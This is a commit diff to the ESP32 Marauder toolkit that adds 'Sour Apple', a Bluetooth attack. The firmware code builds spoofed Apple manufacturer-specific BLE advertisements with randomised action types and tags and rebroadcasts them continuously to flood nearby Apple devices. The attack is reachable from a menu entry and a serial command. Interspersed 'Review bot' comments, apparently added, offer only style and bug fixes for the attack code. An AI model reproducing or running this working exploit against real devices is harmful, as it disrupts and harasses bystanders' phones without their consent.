Add sour apple to Marauder
justcallmekoko committed Oct 12, 2023
1 parent ad6addf commit 1d6ff6f
Showing 8 changed files with 130 additions and 3 deletions.
2 changes: 1 addition & 1 deletion README.md
Expand Up @@ -3,7 +3,7 @@
<!---[![Build Status](https://travis-ci.com/justcallmekoko/ESP32Marauder.svg?branch=master)](https://travis-ci.com/justcallmekoko/ESP32Marauder)--->
<!---Shields/Badges https://shields.io/--->

# ESP32 Marauder v0.12.1
# ESP32 Marauder v0.13.0
<p align="center"><img alt="Marauder logo" src="https://github.com/justcallmekoko/ESP32Marauder/blob/master/pictures/marauder3L.jpg?raw=true" width="300"></p>
<p align="center">
<b>A suite of WiFi/Bluetooth offensive and defensive tools for the ESP32</b>
13 changes: 13 additions & 0 deletions esp32_marauder/CommandLine.cpp
Expand Up @@ -249,6 +249,7 @@ void CommandLine::runCommand(String input) {
// Bluetooth sniff/scan
#ifdef HAS_BT
Serial.println(HELP_BT_SNIFF_CMD);
Serial.println(HELP_BT_SOUR_APPLE_CMD);
#ifdef HAS_GPS
Serial.println(HELP_BT_WARDRIVE_CMD);
#endif
Expand Down Expand Up @@ -771,6 +772,18 @@ void CommandLine::runCommand(String input) {
Serial.println("Bluetooth not supported");
#endif
}
else if (cmd_args.get(0) == BT_SOUR_APPLE_CMD) {
#ifdef HAS_BT
Serial.println("Starting Sour Apple attack. Stop with " + (String)STOPSCAN_CMD);
#ifdef HAS_SCREEN
display_obj.clearScreen();
menu_function_obj.drawStatusBar();
#endif
wifi_scan_obj.StartScan(BT_ATTACK_SOUR_APPLE, TFT_GREEN);
#else
Serial.println("Bluetooth not supported");
#endif
}
// Wardrive
else if (cmd_args.get(0) == BT_WARDRIVE_CMD) {
#ifdef HAS_BT
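Review bot: The status message in the new `sourapple` branch builds its String through a C-style cast, `"Starting Sour Apple attack. Stop with " + (String)STOPSCAN_CMD`; the functional form `String(STOPSCAN_CMD)` expresses the same conversion without a C-style cast and matches the named-cast convention expected in C++ review. The rest of the branch (screen clear, status bar, StartScan under HAS_SCREEN/HAS_BT) mirrors the BT sniff branch directly above it, which suggests a small shared helper if further Bluetooth modes are added the same way. runCommand() starts and ends outside this hunk.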
2 changes: 2 additions & 0 deletions esp32_marauder/CommandLine.h
Expand Up @@ -77,6 +77,7 @@ const char PROGMEM SSID_CMD[] = "ssid";

// Bluetooth sniff/scan
const char PROGMEM BT_SNIFF_CMD[] = "sniffbt";
const char PROGMEM BT_SOUR_APPLE_CMD[] = "sourapple";
const char PROGMEM BT_WARDRIVE_CMD[] = "btwardrive";
const char PROGMEM BT_SKIM_CMD[] = "sniffskim";

Expand Down Expand Up @@ -122,6 +123,7 @@ const char PROGMEM HELP_SSID_CMD_B[] = "ssid -r <index>";

// Bluetooth sniff/scan
const char PROGMEM HELP_BT_SNIFF_CMD[] = "sniffbt";
const char PROGMEM HELP_BT_SOUR_APPLE_CMD[] = "sourapple";
const char PROGMEM HELP_BT_WARDRIVE_CMD[] = "btwardrive [-c]";
const char PROGMEM HELP_BT_SKIM_CMD[] = "sniffskim";
const char PROGMEM HELP_FOOT[] = "==================================";
18 changes: 18 additions & 0 deletions esp32_marauder/MenuFunctions.cpp
Expand Up @@ -494,6 +494,7 @@ void MenuFunctions::main(uint32_t currentTime)
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_RICK_ROLL) ||
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_BEACON_LIST) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_ALL) ||
(wifi_scan_obj.currentScanMode == BT_ATTACK_SOUR_APPLE) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE_CONT) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_SKIMMERS))
Expand Down Expand Up @@ -550,6 +551,7 @@ void MenuFunctions::main(uint32_t currentTime)
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_RICK_ROLL) ||
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_BEACON_LIST) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_ALL) ||
(wifi_scan_obj.currentScanMode == BT_ATTACK_SOUR_APPLE) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE_CONT) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_SKIMMERS) ||
Expand Down Expand Up @@ -1073,6 +1075,7 @@ void MenuFunctions::RunSetup()

// Bluetooth menu stuff
bluetoothSnifferMenu.list = new LinkedList<MenuNode>();
bluetoothAttackMenu.list = new LinkedList<MenuNode>();

// Settings stuff
generateSSIDsMenu.list = new LinkedList<MenuNode>();
Expand All @@ -1095,6 +1098,7 @@ void MenuFunctions::RunSetup()
wifiAttackMenu.name = text_table1[21];
wifiGeneralMenu.name = text_table1[22];
bluetoothSnifferMenu.name = text_table1[23];
bluetoothAttackMenu.name = "Bluetooth Attacks";
generateSSIDsMenu.name = text_table1[27];
clearSSIDsMenu.name = text_table1[28];
clearAPsMenu.name = text_table1[29];
Expand Down Expand Up @@ -1371,6 +1375,9 @@ void MenuFunctions::RunSetup()
this->addNodes(&bluetoothMenu, text_table1[31], TFT_YELLOW, NULL, SNIFFERS, [this]() {
this->changeMenu(&bluetoothSnifferMenu);
});
this->addNodes(&bluetoothMenu, "Bluetooth Attacks", TFT_RED, NULL, ATTACKS, [this]() {
this->changeMenu(&bluetoothAttackMenu);
});

// Build bluetooth sniffer Menu
bluetoothSnifferMenu.parentMenu = &bluetoothMenu; // Second Menu is third menu parent
Expand Down Expand Up @@ -1402,6 +1409,17 @@ void MenuFunctions::RunSetup()
wifi_scan_obj.StartScan(BT_SCAN_SKIMMERS, TFT_MAGENTA);
});

// Bluetooth Attack menu
bluetoothAttackMenu.parentMenu = &bluetoothMenu; // Second Menu is third menu parent
this->addNodes(&bluetoothAttackMenu, text09, TFT_LIGHTGREY, NULL, 0, [this]() {
this->changeMenu(bluetoothAttackMenu.parentMenu);
});
this->addNodes(&bluetoothAttackMenu, "Sour Apple", TFT_GREEN, NULL, DEAUTH_SNIFF, [this]() {
display_obj.clearScreen();
this->drawStatusBar();
wifi_scan_obj.StartScan(BT_ATTACK_SOUR_APPLE, TFT_GREEN);
});

// Device menu
deviceMenu.parentMenu = &mainMenu;
this->addNodes(&deviceMenu, text09, TFT_LIGHTGREY, NULL, 0, [this]() {
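Review bot: `bluetoothAttackMenu.name = "Bluetooth Attacks";` and the matching `addNodes(&bluetoothMenu, "Bluetooth Attacks", ...)` entry use a bare string literal where every neighbouring menu name comes from `text_table1[...]` (for example `bluetoothSnifferMenu.name = text_table1[23];` and `text_table1[31]` for the sniffer node), so the new menu is the only one outside that table; either add a `text_table1` entry or at least share one constant so the two copies of the label cannot drift apart. The "Sour Apple" node passes `DEAUTH_SNIFF` as its fifth argument where the sibling entries pass `SNIFFERS`, `ATTACKS` or `0`; if that is a deliberate reuse of the deauth icon, a comment such as `// reuse the deauth icon for the BLE attack entry` would make it clear rather than looking like a copy-paste leftover. RunSetup() starts and ends outside these hunks.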
1 change: 1 addition & 0 deletions esp32_marauder/MenuFunctions.h
Expand Up @@ -144,6 +144,7 @@ class MenuFunctions

// Bluetooth menu stuff
Menu bluetoothSnifferMenu;
Menu bluetoothAttackMenu;

// Settings things menus
Menu generateSSIDsMenu;
92 changes: 91 additions & 1 deletion esp32_marauder/WiFiScan.cpp
Expand Up @@ -18,6 +18,36 @@ extern "C" int ieee80211_raw_frame_sanity_check(int32_t arg, int32_t arg2, int32
}

#ifdef HAS_BT
//ESP32 Sour Apple by RapierXbox
//Exploit by ECTO-1A
NimBLEAdvertising *pAdvertising;

NimBLEAdvertisementData getOAdvertisementData() {
NimBLEAdvertisementData randomAdvertisementData = NimBLEAdvertisementData();
uint8_t packet[17];
uint8_t size = 17;
uint8_t i = 0;

packet[i++] = size - 1; // Packet Length
packet[i++] = 0xFF; // Packet Type (Manufacturer Specific)
packet[i++] = 0x4C; // Packet Company ID (Apple, Inc.)
packet[i++] = 0x00; // ...
packet[i++] = 0x0F; // Type
packet[i++] = 0x05; // Length
packet[i++] = 0xC1; // Action Flags
const uint8_t types[] = { 0x27, 0x09, 0x02, 0x1e, 0x2b, 0x2d, 0x2f, 0x01, 0x06, 0x20, 0xc0 };
packet[i++] = types[rand() % sizeof(types)]; // Action Type
esp_fill_random(&packet[i], 3); // Authentication Tag
i += 3;
packet[i++] = 0x00; // ???
packet[i++] = 0x00; // ???
packet[i++] = 0x10; // Type ???
esp_fill_random(&packet[i], 3);

randomAdvertisementData.addData(std::string((char *)packet, 17));
return randomAdvertisementData;
}

class bluetoothScanAllCallback: public BLEAdvertisedDeviceCallbacks {

void onResult(BLEAdvertisedDevice *advertisedDevice) {
Expand Down Expand Up @@ -412,6 +442,11 @@ void WiFiScan::StartScan(uint8_t scan_mode, uint16_t color)
RunBluetoothScan(scan_mode, color);
#endif
}
else if (scan_mode == BT_ATTACK_SOUR_APPLE) {
#ifdef HAS_BT
RunSourApple(scan_mode, color);
#endif
}
else if ((scan_mode == BT_SCAN_WAR_DRIVE) ||
(scan_mode == BT_SCAN_WAR_DRIVE_CONT)) {
#ifdef HAS_BT
Expand Down Expand Up @@ -515,10 +550,11 @@ bool WiFiScan::shutdownWiFi() {
bool WiFiScan::shutdownBLE() {
#ifdef HAS_BT
if (this->ble_initialized) {
pAdvertising->stop();
pBLEScan->stop();

pBLEScan->clearResults();
BLEDevice::deinit();
NimBLEDevice::deinit();

#ifdef MARAUDER_FLIPPER
flipper_led.offLED();
Expand Down Expand Up @@ -574,6 +610,7 @@ void WiFiScan::StopScan(uint8_t scan_mode)


else if ((currentScanMode == BT_SCAN_ALL) ||
(currentScanMode == BT_ATTACK_SOUR_APPLE) ||
(currentScanMode == BT_SCAN_WAR_DRIVE) ||
(currentScanMode == BT_SCAN_WAR_DRIVE_CONT) ||
(currentScanMode == BT_SCAN_SKIMMERS))
Expand Down Expand Up @@ -1359,6 +1396,15 @@ void WiFiScan::RunPwnScan(uint8_t scan_mode, uint16_t color)
initTime = millis();
}

void WiFiScan::executeSourApple() {
delay(40);
NimBLEAdvertisementData advertisementData = getOAdvertisementData();
pAdvertising->setAdvertisementData(advertisementData);
pAdvertising->start();
delay(20);
pAdvertising->stop();
}

void WiFiScan::executeWarDrive() {
#ifdef HAS_GPS
if (gps_obj.getGpsModuleStatus()) {
Expand Down Expand Up @@ -1708,6 +1754,31 @@ void WiFiScan::RunProbeScan(uint8_t scan_mode, uint16_t color)
initTime = millis();
}

void WiFiScan::RunSourApple(uint8_t scan_mode, uint16_t color) {
#ifdef HAS_BT
NimBLEDevice::init("");
NimBLEServer *pServer = NimBLEDevice::createServer();

pAdvertising = pServer->getAdvertising();

#ifdef HAS_SCREEN
display_obj.TOP_FIXED_AREA_2 = 48;
display_obj.tteBar = true;
display_obj.print_delay_1 = 15;
display_obj.print_delay_2 = 10;
display_obj.initScrollValues(true);
display_obj.tft.setTextWrap(false);
display_obj.tft.setTextColor(TFT_BLACK, color);
display_obj.tft.fillRect(0,16,240,16, color);
display_obj.tft.drawCentreString("Sour Apple",120,16,2);
display_obj.touchToExit();
display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
#endif

this->ble_initialized;
#endif
}

// Function to start running any BLE scan
void WiFiScan::RunBluetoothScan(uint8_t scan_mode, uint16_t color)
{
Expand Down Expand Up @@ -4033,6 +4104,25 @@ void WiFiScan::main(uint32_t currentTime)
channelHop();
}
}
else if (currentScanMode == BT_ATTACK_SOUR_APPLE) {
#ifdef HAS_BT
if (currentTime - initTime >= 1000) {
initTime = millis();
String displayString = "";
String displayString2 = "";
displayString.concat("Advertising Data...");
for (int x = 0; x < STANDARD_FONT_CHAR_LIMIT; x++)
displayString2.concat(" ");
#ifdef HAS_SCREEN
display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
display_obj.showCenterText(displayString2, 160);
display_obj.showCenterText(displayString, 160);
#endif
}

this->executeSourApple();
#endif
}
else if (currentScanMode == WIFI_SCAN_WAR_DRIVE) {
if (currentTime - initTime >= this->channel_hop_delay * 1000)
{
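Review bot: `this->ble_initialized;` at the end of RunSourApple() is an expression statement with no effect, so the flag that shutdownBLE() checks before stopping advertising and calling `NimBLEDevice::deinit()` is never set by this path; it should read `this->ble_initialized = true;`. The `pAdvertising->stop();` added to shutdownBLE() dereferences a namespace-scope pointer that only RunSourApple() assigns (it is zero-initialised, hence nullptr, until then), so if ble_initialized is set by another BLE path that never touches pAdvertising the shutdown calls stop() through a null pointer; guard it with `if (pAdvertising != nullptr) pAdvertising->stop();` and consider `pAdvertising = nullptr;` after deinit, since whether deinit() keeps the advertising object alive depends on the NimBLE version in use. Smaller points in the same section: getOAdvertisementData() repeats the magic length 17 in `packet[17]`, `size = 17` and `std::string((char *)packet, 17)` where `sizeof(packet)` would keep them in step, `scan_mode` is unused in RunSourApple(), and the two blocking delays in executeSourApple() stall WiFiScan::main() for 60 ms per call, which presumably slows touch-to-exit handling. The StartScan, shutdownBLE, StopScan and main hunks each start and end outside their visible lines.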
3 changes: 3 additions & 0 deletions esp32_marauder/WiFiScan.h
Expand Up @@ -81,6 +81,7 @@
#define WIFI_SCAN_STATION_WAR_DRIVE 33
#define BT_SCAN_WAR_DRIVE 34
#define BT_SCAN_WAR_DRIVE_CONT 35
#define BT_ATTACK_SOUR_APPLE 36

#define GRAPH_REFRESH 100

Expand Down Expand Up @@ -249,6 +250,7 @@ class WiFiScan
void save_mac(unsigned char* mac);
void clearMacHistory();
void executeWarDrive();
void executeSourApple();
void startWardriverWiFi();

void startWiFiAttacks(uint8_t scan_mode, uint16_t color, String title_string);
Expand Down Expand Up @@ -281,6 +283,7 @@ class WiFiScan
void RunProbeScan(uint8_t scan_mode, uint16_t color);
void RunPacketMonitor(uint8_t scan_mode, uint16_t color);
void RunBluetoothScan(uint8_t scan_mode, uint16_t color);
void RunSourApple(uint8_t scan_mode, uint16_t color);
void RunLvJoinWiFi(uint8_t scan_mode, uint16_t color);
void RunEvilPortal(uint8_t scan_mode, uint16_t color);
bool checkMem();
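Review bot: The new declarations `void executeSourApple();` and `void RunSourApple(uint8_t scan_mode, uint16_t color);` carry no comment, and `#define BT_ATTACK_SOUR_APPLE 36` extends a hand-numbered list of plain macros where a duplicated value would go unnoticed; a short `// BLE advertising mode, driven by RunSourApple()/executeSourApple()` beside the define and a `static_assert`-free sanity comment on the numbering would help the next person adding a mode. The `scan_mode` parameter of RunSourApple is not read in its definition in WiFiScan.cpp within this same commit, so either document that it is kept for uniformity with the other Run* signatures or drop it. The WiFiScan class declaration starts and ends outside these hunks.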
2 changes: 1 addition & 1 deletion esp32_marauder/configs.h
Expand Up @@ -22,7 +22,7 @@
//#define XIAO_ESP32_S3
//// END BOARD TARGETS

#define MARAUDER_VERSION "v0.12.2"
#define MARAUDER_VERSION "v0.13.0"

//// BOARD FEATURES
#ifdef MARAUDER_M5STICKC
